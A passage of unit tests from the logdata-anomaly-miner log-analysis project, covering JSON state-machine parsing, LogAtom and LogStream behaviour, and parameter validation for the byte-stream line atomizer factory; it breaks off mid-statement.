        # a "key": value pair is not an array element
        value = b'"key": {"value": 2}]'
        state = array_machine(raise_error)
        for c in value[:value.index(b':') + 1]:
            state = state(c)
        self.assertIsNone(state)

    def test25array_machine_started_from_json_machine(self):
        """Test if the array_machine is started from the json_machine.

        After the closing } of the top-level object the state returned by json_machine is the function named '_value'.
        """
        def check_value(data):
            self.assertEqual(data, compare_value)

        # single line; 22.50 must arrive as the float 22.5
        value = b'{"values_array": ["string", 22, 22.50, true, false, null]}'
        compare_value = {'values_array': ['string', 22, 22.5, True, False, None]}
        state = json_machine(check_value)
        for c in value:
            state = state(c)
        self.assertEqual(state.__name__, '_value')

        # same array, one element per line with tab indentation
        value = b'{"values_array": [\n\t\t"string",\n\t\t22,\n\t\t22.50,\n\t\ttrue,\n\t\tfalse,\n\t\tnull]}'
        state = json_machine(check_value)
        for c in value:
            state = state(c)
        self.assertEqual(state.__name__, '_value')

        # array of objects
        value = b'{"objects_array": [{"value": 22}, {"value": "string"}]}'
        compare_value = {'objects_array': [{'value': 22}, {'value': 'string'}]}
        state = json_machine(check_value)
        for c in value:
            state = state(c)
        self.assertEqual(state.__name__, '_value')

    def test26object_machine_valid_objects(self):
        """Check if the object_machine can handle different valid formats.

        The object_machine is fed the member list directly, i.e. without the opening {; the same dict is expected for
        all three whitespace variants.
        """
        def check_value(data):
            self.assertEqual(data, compare_value)

        # single line, no spaces
        value = b'"string":"Hello World","integer":22,"float":22.23,"bool":true,"array":["Hello","World"]}'
        compare_value = {'string': 'Hello World', 'integer': 22, 'float': 22.23, 'bool': True, 'array': ['Hello', 'World']}
        state = object_machine(check_value)
        for c in value:
            state = state(c)
        self.assertIsNone(state)

        # single line with spaces
        value = b'"string": "Hello World", "integer": 22, "float": 22.23, "bool": true, "array": ["Hello", "World"]}'
        state = object_machine(check_value)
        for c in value:
            state = state(c)
        self.assertIsNone(state)

        # multiline with tabs
        value = b'\n\t"string": "Hello World",\n\t"integer": 22,\n\t"float": 22.23,\n\t"bool": true,\n\t"array": [' \
                b'\n\t\t"Hello",\n\t\t"World"]}'
        state = object_machine(check_value)
        for c in value:
            state = state(c)
        self.assertIsNone(state)

    def test27object_machine_invalid_values(self):
        """Test the object_machine with invalid values.

        As in test24 the callback raises, and input is fed only up to the byte at which the machine must have rejected it.
        """
        def raise_error(_):
            raise Exception("Invalid returned as valid.")

        # keys without "
        value = b'"string":"Hello World",integer:22,"float":22.23,"bool":true,"array":["Hello","World"]}'
        state = object_machine(raise_error)
        for c in value[:value.index(b'integer') + 1]:
            state = state(c)
        self.assertIsNone(state)

        # = instead of :
        value = b'"string":"Hello World","integer"=22,"float":22.23,"bool":true,"array":["Hello","World"]}'
        state = object_machine(raise_error)
        for c in value[:value.index(b'=') + 1]:
            state = state(c)
        self.assertIsNone(state)

        # no comma after attribute. The error is only found after the next :. However this behavior is not problematic, because another
        # attribute or the end bracket } has to follow.
        value = b'"string":"Hello World","integer":22 "float":22.23,"bool":true,"array":["Hello","World"]}'
        state = object_machine(raise_error)
        for c in value[:value.index(b':22.') + 1]:
            state = state(c)
        self.assertIsNone(state)

    def test28object_machine_started_from_json_machine(self):
        """Test if the object_machine is started from the json_machine.

        Same inputs as test26, this time wrapped in { } and driven through json_machine; the final state is '_value'.
        """
        def check_value(data):
            self.assertEqual(data, compare_value)

        # single line, no spaces
        value = b'{"string":"Hello World","integer":22,"float":22.23,"bool":true,"array":["Hello","World"]}'
        compare_value = {'string': 'Hello World', 'integer': 22, 'float': 22.23, 'bool': True, 'array': ['Hello', 'World']}
        state = json_machine(check_value)
        for c in value:
            state = state(c)
        self.assertEqual(state.__name__, '_value')

        # single line with spaces
        value = b'{"string": "Hello World", "integer": 22, "float": 22.23, "bool": true, "array": ["Hello", "World"]}'
        state = json_machine(check_value)
        for c in value:
            state = state(c)
        self.assertEqual(state.__name__, '_value')

        # multiline with tabs
        value = b'{\n\t"string": "Hello World",\n\t"integer": 22,\n\t"float": 22.23,\n\t"bool": true,\n\t"array": [' \
                b'\n\t\t"Hello",\n\t\t"World"]}'
        state = json_machine(check_value)
        for c in value:
            state = state(c)
        self.assertEqual(state.__name__, '_value')

        # keys and strings that themselves contain [ ] and . characters, plus a newline before a closing }
        value = b"""{"HistogramData": {"Bins": {"...-0]": 0, "[0-1]": 0, "[1-2]": 0, "[2-3]": 0, "[3-...]": 0\n}, "BinNames": ["...-0]", "[0-1]", "[1-2]", "[2-3]", "[3-...]"]}}"""
        compare_value = {"HistogramData": {"Bins": {'...-0]': 0, '[0-1]': 0, '[1-2]': 0, '[2-3]': 0, '[3-...]': 0}, "BinNames": [
            '...-0]', '[0-1]', '[1-2]', '[2-3]', '[3-...]']}}
        state = json_machine(check_value)
        for c in value:
            state = state(c)
        self.assertEqual(state.__name__, '_value')

    def test29json_machine_only_allow_objects_at_start(self):
        """The json_machine must only allow objects at the start.

        The forbidden first bytes are the ASCII codes of " + - 1 [ t f n, i.e. the starts of string, number, array,
        true, false and null. Only { yields a non-None state.
        """
        def raise_error(_):
            raise Exception("Invalid returned as valid.")

        forbidden_values = [0x22, 0x2b, 0x2d, 0x31, 0x5b, 0x74, 0x66, 0x6e]
        for value in forbidden_values:
            state = json_machine(raise_error)
            self.assertIsNone(state(value))
        state = json_machine(raise_error)
        self.assertIsNotNone(state(ord('{')))


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/LogAtomTest.py000066400000000000000000000051111500476301700256710ustar00rootroot00000000000000
import unittest
# sys, subprocess, time, sleep and datetime are not referenced anywhere in this file.
import sys
import subprocess
from time import time, sleep
from aminer.input.LogAtom import LogAtom
from aminer.parsing.ParserMatch import ParserMatch
from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext
from datetime import datetime


class LogAtomTest(TestBase):
    """Unittests for the LogAtom."""

    def test1validate_parameters(self):
        """Test all initialization parameters for the event handler. Input parameters must be validated in the class.

        LogAtom is called positionally as (atom data, parser match, atom time, source); each group below varies one
        argument while the others stay valid.
        """
        mc = DummyMatchContext(b" pid=")
        fdme = DummyFixedDataModelElement("s1", b" pid=")
        me = fdme.get_match_element("", mc)
        pm = ParserMatch(me)
        # atom data: anything but bytes is a TypeError, empty bytes a ValueError
        self.assertRaises(TypeError, LogAtom, "", pm, 1, self)
        self.assertRaises(TypeError, LogAtom, ["default"], pm, 1, self)
        self.assertRaises(TypeError, LogAtom, None, pm, 1, self)
        self.assertRaises(TypeError, LogAtom, True, pm, 1, self)
        self.assertRaises(TypeError, LogAtom, 123, pm, 1, self)
        self.assertRaises(TypeError, LogAtom, 123.3, pm, 1, self)
        self.assertRaises(TypeError, LogAtom, {"id": "Default"}, pm, 1, self)
        self.assertRaises(TypeError, LogAtom, (), pm, 1, self)
        self.assertRaises(TypeError, LogAtom, set(), pm, 1, self)
        self.assertRaises(ValueError, LogAtom, b"", pm, 1, self)
        # parser match: must be a ParserMatch (or None, see the valid call at the end of the method)
        self.assertRaises(TypeError, LogAtom, fdme.data, "", 1, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, ["default"], 1, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, True, 1, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, 123, 1, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, 123.3, 1, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, {"id": "Default"}, 1, self)
        self.assertRaises(TypeError,
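# continuation of the assertRaises(TypeError, ...) call opened on the preceding dump line
                          LogAtom, fdme.data, (), 1, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, set(), 1, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, b"", 1, self)
        # atom time: every non-numeric, non-None value is rejected, bool included.
        self.assertRaises(TypeError, LogAtom, fdme.data, pm, "", self)
        self.assertRaises(TypeError, LogAtom, fdme.data, pm, ["default"], self)
        self.assertRaises(TypeError, LogAtom, fdme.data, pm, True, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, pm, {"id": "Default"}, self)
        self.assertRaises(TypeError, LogAtom, fdme.data, pm, (), self)
        self.assertRaises(TypeError, LogAtom, fdme.data, pm, set(), self)
        self.assertRaises(TypeError, LogAtom, fdme.data, pm, b"", self)
        # parser match, atom time and source may all be None; only the data is mandatory.
        LogAtom(b"data", None, None, None)


if __name__ == '__main__':
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/LogStreamTest.py000066400000000000000000000351611500476301700262340ustar00rootroot00000000000000
import unittest
import os
import base64
import socket
import hashlib
import subprocess
from aminer.input.LogStream import FileLogDataResource, UnixSocketLogDataResource, LogStream
from aminer.events.StreamPrinterEventHandler import StreamPrinterEventHandler
from aminer.input.ByteStreamLineAtomizer import ByteStreamLineAtomizer
from unit.TestBase import TestBase, DummyFixedDataModelElement


class LogStreamTest(TestBase):
    """Unittests for the LogStream.

    All tests read a fixture file with a fixed name below /tmp which setUp() writes and tearDown() removes: 150 lines of
    "<n> <1000 x d>\\r\\n", large enough for the two full buffer fills test1 relies on. Because the name is fixed and /tmp is
    shared by every process on the host, two concurrent runs of this suite (or any unrelated process using that name)
    would corrupt each other's fixture.
    """

    logfile = b"/tmp/log.txt"
    file = b"file://"

    def setUp(self):
        """Write the fixture logfile."""
        super().setUp()
        with open(self.logfile, "w+") as f:
            for i in range(150):
                f.write("%d %s\r\n" % (i + 1, "d" * 1000))

    def tearDown(self):
        """Remove the fixture logfile."""
        super().tearDown()
        os.remove(self.logfile)

    def test1file_log_data_resource_log_stream_closed_no_repositioning(self):
        """
        In this case the log_stream_fd is -1 and repositioning_data is None.
        The next step is to open the stream successfully.
        Afterwards the buffer object is filled with data and the position is updated; a second fill/update cycle checks that
        total_consumed_length accumulates.
        """
        fldr = FileLogDataResource(self.file + self.logfile, -1)
        fldr.open(False)
        try:
            self.assertEqual(fldr.buffer, b"")
            length = fldr.fill_buffer()
            self.assertEqual(length, fldr.default_buffer_size)
            fldr.update_position(length)
            self.assertEqual(fldr.buffer, b"")
            self.assertEqual(fldr.total_consumed_length, fldr.default_buffer_size)

            # repeat to see if total_consumed_length was changed.
            length = fldr.fill_buffer()
            self.assertEqual(length, fldr.default_buffer_size)
            fldr.update_position(length)
            self.assertEqual(fldr.buffer, b"")
            self.assertEqual(fldr.total_consumed_length, 2 * fldr.default_buffer_size)
        finally:
            # close even when an assertion above fails, so the fd does not outlive the test.
            fldr.close()

    def test2unix_socket_log_data_resource(self):
        """
        In this case the log_stream_fd is -1. The next step is to open the stream successfully.
        Therefor a server socket is set up listen to data to the server.
        Afterwards, the buffer object is filled with data and the position is updated.

        The client is the helper script unit/input/client.py, run as a child process; it is expected to send b"data".
        """
        sock_name = b"/tmp/test5unixSocket.sock"
        # Fixed path below /tmp: a stale socket file from an earlier run is removed first. Any other process could create a
        # file under this name between the remove and the bind, in which case bind() fails loudly, which is the safe outcome.
        if os.path.exists(sock_name):
            os.remove(sock_name)
        print("Opening socket...")
        server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        proc = None
        unix_socket_log_data_resource = None
        try:
            # Bind and listen BEFORE the client process is started, so the client can never race ahead of the server and fail
            # to connect. The accept() is bounded so a client that dies early cannot hang the whole suite.
            server.bind(sock_name)
            server.listen(1)
            server.settimeout(10)
            proc = subprocess.Popen(["python3", "unit/input/client.py"])
            connection = server.accept()[0]
            unix_socket_log_data_resource = UnixSocketLogDataResource(b"unix://" + sock_name, connection.fileno())
            print("Listening...")
            unix_socket_log_data_resource.fill_buffer()
            self.assertEqual(repr(unix_socket_log_data_resource.buffer), repr(b"data"))
            print("Data received: %s" % unix_socket_log_data_resource.buffer.decode())
            unix_socket_log_data_resource.update_position(len(unix_socket_log_data_resource.buffer))
            self.assertEqual(unix_socket_log_data_resource.total_consumed_length, 4)
            self.assertEqual(unix_socket_log_data_resource.buffer, b"")
        finally:
            # Tear down in every case: the child process must not be left behind when an assertion fails.
            print("Shutting down...")
            if unix_socket_log_data_resource is not None:
                unix_socket_log_data_resource.close()
            server.close()
            if proc is not None:
                proc.terminate()
                proc.wait()
            print("Done")

    def test3_log_stream_handle_streams(self):
        """
        This unit case verifies the functionality of the LogStream class.
        Different FileLogDataResources are added to the stream. The handling of not existing sources is also tested.

        NOTE: the second resource is /var/log/auth.log, so this test depends on that file existing and being readable by the
        user running the suite.
        """
        fdme = DummyFixedDataModelElement("fdme", b"a1")
        bstla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 300, [])
        fldr = FileLogDataResource(self.file + self.logfile, -1)
        self.assertEqual(fldr.buffer, b"")
        ls = LogStream(fldr, bstla)
        fldr.open(False)
        # two handle_stream() calls on the same resource do not consume beyond one buffer size.
        ls.handle_stream()
        self.assertEqual(fldr.total_consumed_length + len(fldr.buffer), fldr.default_buffer_size)
        ls.handle_stream()
        self.assertEqual(fldr.total_consumed_length + len(fldr.buffer), fldr.default_buffer_size)

        fldr2 = FileLogDataResource(b"file:///var/log/auth.log", -1)
        self.assertEqual(fldr2.buffer, b"")
        fldr2.open(False)
        ls.add_next_resource(fldr2)
        ls.roll_over()
        ls.handle_stream()
        self.assertGreater(fldr.total_consumed_length, 0)
        self.assertEqual(fldr.total_consumed_length, fldr.default_buffer_size)
        self.assertGreater(fldr2.total_consumed_length, 0)
        ls.roll_over()

        # rolling over to a resource whose file does not exist must raise.
        fldr3 = FileLogDataResource(b"file:///var/log/123example.log", -1)
        fldr3.open(False)
        ls.add_next_resource(fldr3)
        self.assertRaises(OSError, ls.roll_over)

    def test4file_log_data_resource_log_stream_already_open_repositioning(self):
        """
        In this case the logStreamFd is > 0 and repositioning_data is not None.
        The stream should be repositioned to the right position.

        repositioning_data is [inode, consumed length, base64(md5 of the first `length` bytes)]. The digest is the
        fingerprint format the resource compares against the file (a consistency check, not a security control); a wrong
        inode or a wrong length must leave total_consumed_length at 0.
        """
        length = 65536
        # read the reference bytes once, then release that descriptor before handing a fresh one to the resource.
        fd = os.open(self.logfile, os.O_RDONLY)
        try:
            data = os.read(fd, length)
        finally:
            os.close(fd)
        encoded_digest = base64.b64encode(hashlib.md5(data).digest())

        fd = os.open(self.logfile, os.O_RDONLY)
        try:
            inode = os.fstat(fd).st_ino
            fldr = FileLogDataResource(self.file + self.logfile, fd, length, [inode, length, encoded_digest])
            fldr.fill_buffer()
            self.assertNotEqual(fldr.buffer, data)
            self.assertNotEqual(fldr.total_consumed_length, 0)

            # wrong inode number
            fldr = FileLogDataResource(self.file + self.logfile, fd, length, [inode + 1, length, encoded_digest])
            self.assertEqual(fldr.total_consumed_length, 0)

            # wrong size of repositioning data number
            # Fix: the constructed resource used to be discarded, so the assertion below silently re-checked the
            # "wrong inode" object instead of this one.
            fldr = FileLogDataResource(self.file + self.logfile, fd, length, [inode, length + 1, encoded_digest])
            self.assertEqual(fldr.total_consumed_length, 0)
        finally:
            os.close(fd)

    def test4validate_parameters(self):
        """Test all initialization parameters. Input parameters must be validated in the class.

        Covers FileLogDataResource, UnixSocketLogDataResource and LogStream; one argument is varied per loop while the
        others stay valid. The descriptor is closed in a finally so a failing assertion does not leak it.
        """
        fd = os.open(self.logfile, os.O_RDONLY)
        try:
            length = 65536
            data = os.read(fd, length)
            encoded_digest = base64.b64encode(hashlib.md5(data).digest())
            inode = os.fstat(fd).st_ino
            file_url = b"file:///tmp/log.txt"
            unix_url = b"unix:///tmp/log.txt"

            # FileLogDataResource: resource name must be non-empty bytes carrying the file:// scheme.
            for bad_name in ["file:///tmp/log.txt", ["file:///tmp/log.txt"], None, True, 123, 123.23, {"id": "Default"}, (),
                             set("file:///tmp/log.txt")]:
                self.assertRaises(TypeError, FileLogDataResource, bad_name, fd, 65536)
            self.assertRaises(ValueError, FileLogDataResource, b"", fd, 65536)
            self.assertRaises(ValueError, FileLogDataResource, b"file://", -1)
            self.assertRaises(ValueError, FileLogDataResource, b"/var/log/syslog", -1)
            # log_stream_fd must be an int.
            for bad_fd in ["123", b"123", None, 123.3, True, {"id": "Default"}, (), set("123")]:
                self.assertRaises(TypeError, FileLogDataResource, file_url, bad_fd, 65536)
            # default_buffer_size must be a positive int.
            for bad_size in ["123", b"123", None, True, {"id": "Default"}, (), set("123")]:
                self.assertRaises(TypeError, FileLogDataResource, file_url, fd, bad_size)
            for bad_size in [-1, 0]:
                self.assertRaises(ValueError, FileLogDataResource, file_url, fd, bad_size)
            # repositioning_data must be None or exactly [int inode, int length, bytes digest].
            for bad_repositioning in ["123", b"123", True, {"id": "Default"}, (), set("123"), [inode], [inode, length],
                                      [inode, length, encoded_digest, 4], ["d", length, encoded_digest],
                                      [inode, True, encoded_digest], [inode, length, 1]]:
                self.assertRaises(TypeError, FileLogDataResource, file_url, fd, 65536, bad_repositioning)
            fldr = FileLogDataResource(file_url, fd, 65536, [inode, length, encoded_digest])
            FileLogDataResource(file_url, fd, 65536, None)

            # UnixSocketLogDataResource: same rules, but the scheme must be unix://.
            self.assertRaises(ValueError, UnixSocketLogDataResource, b"/tmp/log", -1)
            for bad_name in ["unix:///tmp/log.txt", ["unix:///tmp/log.txt"], None, True, 123, 123.23, {"id": "Default"}, (),
                             set("file:///tmp/log.txt")]:
                self.assertRaises(TypeError, UnixSocketLogDataResource, bad_name, fd, 65536)
            self.assertRaises(ValueError, UnixSocketLogDataResource, b"", fd, 65536)
            self.assertRaises(ValueError, UnixSocketLogDataResource, b"unix://", -1)
            self.assertRaises(ValueError, UnixSocketLogDataResource, b"/var/log/syslog", -1)
            for bad_fd in ["123", b"123", None, 123.3, True, {"id": "Default"}, (), set("123")]:
                self.assertRaises(TypeError, UnixSocketLogDataResource, unix_url, bad_fd, 65536)
            for bad_size in ["123", b"123", None, True, {"id": "Default"}, (), set("123")]:
                self.assertRaises(TypeError, UnixSocketLogDataResource, unix_url, fd, bad_size)
            for bad_size in [-1, 0]:
                self.assertRaises(ValueError, UnixSocketLogDataResource, unix_url, fd, bad_size)

            # LogStream: both the resource and the atomizer are type-checked.
            fdme = DummyFixedDataModelElement("fdme", b"a1")
            bstla = ByteStreamLineAtomizer(fdme, [], [self.stream_printer_event_handler], 300, [])
            not_a_resource_or_atomizer = ["123", b"123", None, 123, 123.3, True, {"id": "Default"}, (), set("123")]
            for bad_resource in not_a_resource_or_atomizer:
                self.assertRaises(TypeError, LogStream, bad_resource, bstla)
            for bad_atomizer in not_a_resource_or_atomizer:
                self.assertRaises(TypeError, LogStream, fldr, bad_atomizer)
            LogStream(fldr, bstla)
        finally:
            os.close(fd)


if __name__ == "__main__":
    unittest.main()
logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/input/SimpleByteStreamLineAtomizerFactoryTest.py000066400000000000000000000346301500476301700334430ustar00rootroot00000000000000
import unittest
from aminer.input.SimpleByteStreamLineAtomizerFactory import SimpleByteStreamLineAtomizerFactory
from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector
from unit.TestBase import TestBase, DummyFixedDataModelElement


class SimpleByteStreamLineAtomizerFactoryTest(TestBase):
    """The SimpleByteStreamLineAtomizerFactory should return a valid ByteStreamLineAtomizer with all parameters of the Factory."""

    def test1get_atomizer(self):
        """Tests the creating of an SimpleByteStreamLineAtomizer with the Factory.

        The atomizer returned for resource None must carry the handler lists and parsing model given to the factory.
        """
        fdme = DummyFixedDataModelElement("fixed", b"fixed data")
        nmpd1 = NewMatchPathDetector(self.aminer_config, [], "Default", False)
        nmpd2 = NewMatchPathDetector(self.aminer_config, [], "Default", False)
        sbslaf = SimpleByteStreamLineAtomizerFactory(fdme, [nmpd1, nmpd2], [self.stream_printer_event_handler], None)
        bsla = sbslaf.get_atomizer_for_resource(None)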
self.assertEqual(bsla.atom_handler_list, [nmpd1, nmpd2]) self.assertEqual(bsla.event_handler_list, [self.stream_printer_event_handler]) self.assertEqual(bsla.default_timestamp_path_list, []) self.assertEqual(bsla.parsing_model, fdme) self.assertEqual(bsla.max_line_length, 65536) self.assertEqual(bsla.resource_name, None) def test2validate_parameters(self): """Test all initialization parameters for the atomizer. Input parameters must be validated in the class.""" data = b"fixed data" fdme = DummyFixedDataModelElement("fixed", data) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, "default", [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, b"Default", [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, None, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, True, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, 123, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, 123.3, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, ["default"], [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, {"id": "Default"}, [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, (), [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, set(), [], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, "default", [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, b"Default", [self.stream_printer_event_handler], []) 
self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, True, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, 123, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, 123.3, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, ["default"], [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, {"id": "Default"}, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, (), [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, set(), [self.stream_printer_event_handler], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], "default", []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], b"Default", []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], None, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], True, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], 123, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], 123.3, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], ["default"], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], {"id": "Default"}, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], (), []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], set(), []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], "default", []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], b"Default", []) 
self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], None, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], True, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], 123.3, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], ["default"], []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], {"id": "Default"}, []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], (), []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], set(), []) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], "default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], True) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], 123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], set()) 
SimpleByteStreamLineAtomizerFactory(fdme, [], [self.stream_printer_event_handler], None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=True) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=set()) self.assertRaises(ValueError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], eol_sep=b"") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=123) 
self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], json_format=set()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format="default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=b"Default") self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=None) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=123) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=123.3) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=[b"default"]) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format={"id": "Default"}) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=()) self.assertRaises(TypeError, SimpleByteStreamLineAtomizerFactory, fdme, [], [self.stream_printer_event_handler], [], xml_format=set()) self.assertRaises(ValueError, SimpleByteStreamLineAtomizerFactory, 
